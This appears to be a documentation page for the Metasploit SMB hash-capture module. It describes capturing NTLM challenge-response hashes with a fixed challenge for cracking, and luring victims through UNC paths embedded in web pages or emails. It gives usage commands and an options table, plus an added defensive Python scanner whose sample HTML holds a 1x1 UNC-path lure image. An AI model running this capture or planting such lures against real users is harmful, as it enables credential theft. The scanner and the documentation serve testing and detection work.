Authentication Capture: SMB
This module provides an SMB service that can be used to capture the challenge-response password hashes of SMB client systems. By default, responses sent by this service use the configurable challenge string (\x11\x22\x33\x44\x55\x66\x77\x88), allowing for easy cracking using Cain & Abel, L0phtCrack or John the Ripper (with the jumbo patch). To exploit this, the target system must try to authenticate to this module. The easiest way to force an SMB authentication attempt is by embedding a UNC path (\\SERVER\SHARE) into a web page or email message. When the victim views the web page or email, their system will automatically connect to the server specified in the UNC path (the IP address of the system running this module) and attempt to authenticate.
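The description above explains that any UNC path or file:// link in rendered web or email content makes a Windows client open an outbound SMB connection and authenticate to whatever host the path names. From the defender's side, the useful check is the inverse: scan outbound or inbound content for such references and flag the ones pointing at hosts outside the organisation. The following is an added example written for this page, not part of the Metasploit module or its documentation; the HTML sample, the internal address ranges and the `.corp.example` suffix are constructed stand-ins, and the function names (`find_unc_references`, `is_external_host`, `external_hosts`) are this example's own.

```python
"""Scan HTML or e-mail body text for embedded UNC paths and file:// URLs
that would cause a Windows client to connect (and NTLM-authenticate) to
the named host when the content is rendered.  Added example; not code
from the Metasploit project."""
import ipaddress
import re
from typing import Dict, Iterable, List

# \\SERVER\SHARE form.  Host: letters, digits, dots, hyphens.  The share
# name stops at the next backslash, whitespace or HTML/quote delimiter.
UNC_RE = re.compile(r'\\\\([A-Za-z0-9._-]+)\\([^\\\s"\'<>]+)')

# file://SERVER/share form (browsers and mail clients map this onto the
# same SMB connection).  A local path such as file:///C:/... has a colon
# in the "host" position and therefore does not match.
FILE_URL_RE = re.compile(r'file:/+([A-Za-z0-9._-]+)/([^\s"\'<>/]+)', re.IGNORECASE)

# Address ranges treated as internal (constructed policy for this example:
# RFC 1918, loopback and link-local).  An explicit list is used rather than
# ipaddress's is_private so that documentation ranges such as 203.0.113.0/24
# count as "Internet" hosts in the sample below.
INTERNAL_NETS = [ipaddress.ip_network(n) for n in (
    '10.0.0.0/8', '172.16.0.0/12', '192.168.0.0/16',
    '127.0.0.0/8', '169.254.0.0/16')]


def is_external_host(host: str, internal_suffixes: Iterable[str] = ()) -> bool:
    """True if the host would be reached over the Internet.

    IP literals are checked against INTERNAL_NETS.  Single-label names
    (NetBIOS/intranet style, e.g. FILESRV) are internal; dotted names are
    internal only if they end in one of internal_suffixes."""
    try:
        ip = ipaddress.ip_address(host)
        return not any(ip in net for net in INTERNAL_NETS)
    except ValueError:
        pass
    if '.' not in host:
        return False
    lowered = host.lower()
    return not any(lowered.endswith(s.lower()) for s in internal_suffixes)


def find_unc_references(text: str, internal_suffixes: Iterable[str] = ()) -> List[Dict[str, object]]:
    """Return one finding per UNC path / file:// URL in text, in order of
    pattern (UNC paths first, then file URLs), each tagged external or not."""
    findings: List[Dict[str, object]] = []
    for pattern, kind in ((UNC_RE, 'unc'), (FILE_URL_RE, 'file-url')):
        for m in pattern.finditer(text):
            host, share = m.group(1), m.group(2)
            findings.append({
                'kind': kind,
                'host': host,
                'share': share,
                'external': is_external_host(host, internal_suffixes),
                'raw': m.group(0),
            })
    return findings


def external_hosts(text: str, internal_suffixes: Iterable[str] = ()) -> List[str]:
    """Sorted, de-duplicated list of external hosts the content would make a
    client authenticate to; an egress block on TCP/445 is the usual mitigation."""
    return sorted({str(f['host']) for f in find_unc_references(text, internal_suffixes)
                   if f['external']})


# Constructed sample: one 1x1 image pulled from a TEST-NET-3 address, one
# file:// link to an internal file server, one UNC link to an RFC 1918 host,
# and one local file:/// path that must not be reported.
SAMPLE_HTML = r'''<html><body>
<p>Quarterly report attached.</p>
<img src="\\203.0.113.10\share\logo.png" width="1" height="1">
<a href="file://fileserver.corp.example/public/report.docx">Report</a>
<a href="\\10.0.0.5\finance\q3.xlsx">Finance share</a>
<a href="file:///C:/Users/Public/readme.txt">local</a>
</body></html>'''

if __name__ == '__main__':
    for f in find_unc_references(SAMPLE_HTML, internal_suffixes=('.corp.example',)):
        flag = 'EXTERNAL' if f['external'] else 'internal'
        print(f"{flag:8} {f['kind']:8} host={f['host']} share={f['share']}")
    print('external hosts:', external_hosts(SAMPLE_HTML, ('.corp.example',)))
```

Run against a mail gateway's HTML bodies or a proxy's response bodies, the `external` flag is the one worth alerting on: an internal UNC path is normal business traffic, while a path to an Internet host means the client will send an NTLM challenge-response to a server the organisation does not control.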
Rank
- Normal
Authors
- hdm <hdm [at] metasploit.com>
Similar Modules
- auxiliary/server/capture/ftp
- auxiliary/server/capture/http
- auxiliary/server/capture/http_javascript_keylogger
- auxiliary/server/capture/http_ntlm
- auxiliary/server/capture/imap
- auxiliary/server/capture/pop3
- auxiliary/server/capture/smtp
- auxiliary/server/capture/telnet
Usage Information
msf > use auxiliary/server/capture/smb
msf auxiliary(smb) > run
Module Options
| Option | Description |
| --- | --- |
| CAINPWFILE | The local filename to store the hashes in Cain & Abel format |
| CHALLENGE | The 8 byte challenge (default: 1122334455667788) |
| JOHNPWFILE | The prefix to the local filename to store the hashes in John the Ripper format |
| SRVHOST | The local host to listen on. This must be an address on the local machine or 0.0.0.0 (default: 0.0.0.0) |
| SRVPORT | The local port to listen on (default: 445) |
| SSL | Negotiate SSL for incoming connections |
| SSLCert | Path to a custom SSL certificate (default is randomly generated) |
| SSLVersion | Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1) (default: SSL3) |
| DOMAIN_NAME | The domain name used during the SMB exchange when SMB extended security is set |
| ListenerComm | The specific communication channel to use for this service |
| NTLM_UseNTLM2_session | Activate the 'negotiate NTLM2 key' flag in NTLM authentication. When SMB extended security negotiation is set, the client will use NTLM2 session security instead of NTLMv1 (default on Windows 2000 and above) |
| SMB_EXTENDED_SECURITY | Use SMB extended security negotiation. When set, the client will use NTLMSSP; if not, the client will use classic LanMan authentication |
| USE_GSS_NEGOCIATION | Send a GSS security blob in the SMB negotiate response when SMB extended security is set. When this flag is not set, Windows will respond without GSS encapsulation; Ubuntu will still use GSS |
| VERBOSE | Enable detailed status messages |
| WORKSPACE | Specify the workspace for this module |
| TCP::max_send_size | Maximum TCP segment size (0 = disable) |
| TCP::send_delay | Delay inserted before every send (0 = disable) |
